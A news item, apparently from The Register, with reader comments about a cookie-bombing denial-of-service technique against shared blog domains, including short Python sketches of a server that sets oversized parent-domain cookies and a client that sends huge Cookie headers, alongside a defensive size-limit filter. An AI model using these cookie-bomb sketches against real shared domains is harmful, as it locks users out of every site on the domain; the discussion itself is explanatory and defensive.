MONSTER COOKIES can nom nom nom ALL THE BLOGS

Giant cookies could be used to create a denial of service (DoS) on blog networks, says infosec researcher Bogdan Calin. Such an attack would work by feeding users cookies with header values so large that they trigger web server errors. Calin created a proof of concept attack against the Google Blog Spot network after a …
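
In outline, a single malicious page on the shared domain hands the browser a pile of oversized cookies scoped to the parent domain, which the browser then attaches to every subsequent request. A minimal sketch of the idea, assuming a toy Python server (illustrative only, not Calin's actual proof of concept; the domain, handler name, port and cookie sizes are placeholders):

# Illustrative cookie-bombing response: ~100 Set-Cookie headers of ~3 KB each,
# scoped to the shared parent domain, so later requests anywhere on that domain
# carry roughly 300 KB of Cookie data and get rejected by the server.
from http.server import BaseHTTPRequestHandler, HTTPServer

class CookieBombHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        for i in range(100):
            self.send_header(
                "Set-Cookie",
                "bomb%d=%s; Domain=.example.com; Path=/" % (i, "x" * 3000),
            )
        self.end_headers()
        self.wfile.write(b"<html><body>An innocent-looking blog post</body></html>")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), CookieBombHandler).serve_forever()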

  1. as2003

    Although section 6.3 of RFC 2109 (written in 1997) is talking about the client side, I think it's not unfair to infer that a server should be able to support requests with at least 300 x 4kb cookies.

    In his test, Bogdan Calin uses 100 x 3k cookies.

    6.3 Implementation Limits

    Practical user agent implementations have limits on the number and size of cookies that they can store. In general, user agents' cookie support should have no fixed limits. They should strive to store as many frequently-used cookies as possible. Furthermore, general-use user agents should provide each of the following minimum capabilities individually, although not necessarily simultaneously:

    • at least 300 cookies
    • at least 4096 bytes per cookie (as measured by the size of the characters that comprise the cookie non-terminal in the syntax description of the Set-Cookie header)
    • at least 20 cookies per unique host or domain name

    6.3.1 Denial of Service Attacks

    User agents may choose to set an upper bound on the number of cookies to be stored from a given host or domain name or on the size of the cookie information. Otherwise a malicious server could attempt to flood a user agent with many cookies, or large cookies, on successive responses, which would force out cookies the user agent had received from other servers. However, the minima specified above should still be supported.

    1. pklausner

      Wrong inference?

      > I think it's not unfair to infer that a server should be able

      > to support requests with at least 300 x 4kb cookies.


      Doesn't the quoted section translate to "at least 20 x 4kb cookies"?

      Which makes much more sense than 1.2 MB requests...

      1. as2003

        Re: Wrong inference?

        Yes, good point. My mistake.

        Anyway, it sounds like the behaviour needs to be better defined.
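
        For reference, a quick back-of-the-envelope check of the two readings, using the minima quoted above (illustrative arithmetic only):

        per_cookie = 4096            # "at least 4096 bytes per cookie"
        print(300 * per_cookie)      # 1228800 bytes, ~1.2 MB: the overall storage minimum
        print(20 * per_cookie)       # 81920 bytes, ~80 KB: the per-host/domain minimum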

  2. James 51

    Does this mean that disabling cookies prevents the attack from working?

    1. phuzz Silver badge
      Facepalm

      Yes.

      In the nicest possible way: all the information was right there in the article for you to read. Perhaps you should pay more attention in future?

  3. Tom 38

    Not really denial of service

    The "attack" does not force excess resource consumption, and the service is still available, just not to afflicted clients.

    1. Stevie

      Re: does not force excess resource consumption

      Er ... 0.8 meg of bandwidth wasted ... per request ... each request must be processed so it can be rejected so cycles burned for no good effect (server admin not happy, browser user not happy) ... howevermany watts of walljuice burned for no advantage ... what am I missing?

  4. Nick Ryan Silver badge

    So what this really means is that on any shared website domain service (commonly blogs, but not restricted to them), one of the shared sites could prevent a user, or more accurately a specific user agent (web browser), from accessing any service on the same shared domain.

    In other words, if you have a structure of:

    site1.example.com

    site2.example.com

    site3.example.com

    site3.example.com could respond with an abnormally large number of cookies, or abnormally large cookies, for example.com, in total more than the web server is designed or configured to support. These maliciously sized cookies would then be included with every request to any example.com resource, effectively blocking access to example.com and all of its sub-domains.

    Ouch. All we need now is for a Cross-Site-Cookie vulnerability and a malicious website could block access to any arbitrary website.

    It will be interesting to see where the most appropriate fixes for this end up. My guess is that the only possible or sensible place is the web browsers, as web servers can't tell a given UA not to send cookies, and AFAIK it's not possible to limit the upward propagation of cookie paths on the server side either, as these are client controlled. That'll scupper those who can't update their web browsers due to supplier lock-in.
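
    A hypothetical sketch of the kind of response site3.example.com could send; the cookie names and sizes below are made up for illustration:

    # Set-Cookie headers a rogue site3.example.com response could include, scoped
    # to the parent domain so the browser attaches them to site1 and site2 as well.
    rogue_set_cookies = [
        "pad%d=%s; Domain=.example.com; Path=/" % (i, "x" * 4000)
        for i in range(20)    # 20 cookies is the per-domain minimum from RFC 2109
    ]

    # The Cookie header the browser would then send with any example.com request:
    cookie_header = "; ".join(c.split(";", 1)[0] for c in rogue_set_cookies)
    print(len(cookie_header))    # roughly 80 KB attached to every single request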

    1. Anonymous Coward
      Anonymous Coward

      Bingo

      Yup, servers can't properly fix this. If they accept unlimited cookies they'll get DoS'd. There's no way to skip long cookies without receiving and parsing them... for example:

      GET /archive/2014/06/browsers-are-total-crap HTTP/1.1

      ...most of the important headers...

      Cookie: <100 MB of garbage>

      Connection: keep-alive

      Cache-Control: max-age=0

      I suppose a server could stop after ~80k of cookie and ASSUME those last two headers are the only ones after Cookie, but that seems dodgy.... and more importantly it would block POSTs from commentards.
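
      A rough way to see the effect from the client side, assuming a throwaway test server on localhost that you control (host, port and cookie sizes are placeholders):

      import http.client

      # Send one request carrying ~300 KB of cookie data and see how the server
      # reacts: typically a 400/413 error page, or the connection simply dropped.
      oversized = "; ".join("c%d=%s" % (i, "x" * 3000) for i in range(100))
      conn = http.client.HTTPConnection("localhost", 8080, timeout=10)
      conn.request("GET", "/", headers={"Cookie": oversized})
      resp = conn.getresponse()
      print(resp.status, resp.reason)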

      1. Robert Helpmann??
        Childcatcher

        Re: Bingo

        ...a Google security rep [said] the risk was a problem for web browser developers to fix, rather than lone web app providers...

        Perhaps someone can set me straight. Doesn't this amount to poor error handling on the part of the web servers? I would think that this is the sort of thing that mail servers have to deal with in handling attachments. Why can't cookies be filtered based on size, even if it is not by the web server itself? I understand that mail and web servers are not the same thing, but the issue has to have come up before. It would seem to me that the solution used in one case should at least be considered in the other.

        1. Tom 38

          Re: Bingo

          No, it is perfect error handling on the part of the web servers. Normal, non-malicious clients do not send multi-megabyte GET requests to web servers, and thus it is perfectly correct for the server to terminate the connection with a "413 Request Entity Too Large" error.
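
          A minimal application-level sketch of that behaviour, assuming a plain WSGI app and an illustrative 8 KB cut-off (a real front-end server will usually enforce its own header limits before the application ever sees the request):

          from wsgiref.simple_server import make_server

          MAX_COOKIE_BYTES = 8 * 1024    # illustrative threshold, not a standard value

          def app(environ, start_response):
              # Refuse implausibly large Cookie headers outright instead of parsing them.
              cookie = environ.get("HTTP_COOKIE", "")
              if len(cookie) > MAX_COOKIE_BYTES:
                  start_response("413 Request Entity Too Large",
                                 [("Content-Type", "text/plain")])
                  return [b"Cookie header too large\n"]
              start_response("200 OK", [("Content-Type", "text/plain")])
              return [b"Normal response\n"]

          if __name__ == "__main__":
              make_server("127.0.0.1", 8000, app).serve_forever()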

  5. Anonymous Coward
    Anonymous Coward

    Considering the tripe that makes up most blogs, this would be a bad thing because?

  6. Anonymous Coward
    Anonymous Coward

    My twopence

    As user as2003 has suggested, the current state of things, at both the client and server level, seems a reasonable compromise.

    Would the problem not be, rather, one of site architecture? Specifically, with hosting unrelated and untrusted subdomains under the same domain? This possibly relates not only to cookies but also, e.g., to X.509 certificates (subdomain.domain.com manages to get a cert for *.domain.com).

    For a player with deep pockets such as Google, the solution would be to get their own root domain, e.g., .blogspot and move blah.blogspot.com to blah.blogspot.

    1. Anonymous Coward
      Anonymous Coward

      Re: My twopence

      One downvote but no reply... would anyone sufficiently knowledgeable care to critique the above post?

  7. Anonymous Coward
    Anonymous Coward

    Remember when cookies

    only stored the last time you visited the site and could do no harm, according to privacy experts?

    That must have been around 1995-1998. The internet was slow and expensive, but at least it wasn't so god damn dangerous and viruses were still rare. These days you've got to be on your toes all the time.

  8. Anonymous Coward
    Anonymous Coward

    Been there

    This already happens when your marketing department decides, without review, to install a pile of 3rd party analytics software that they heard is new and cool. Your site gets slower, slower, slower, and then goes away.
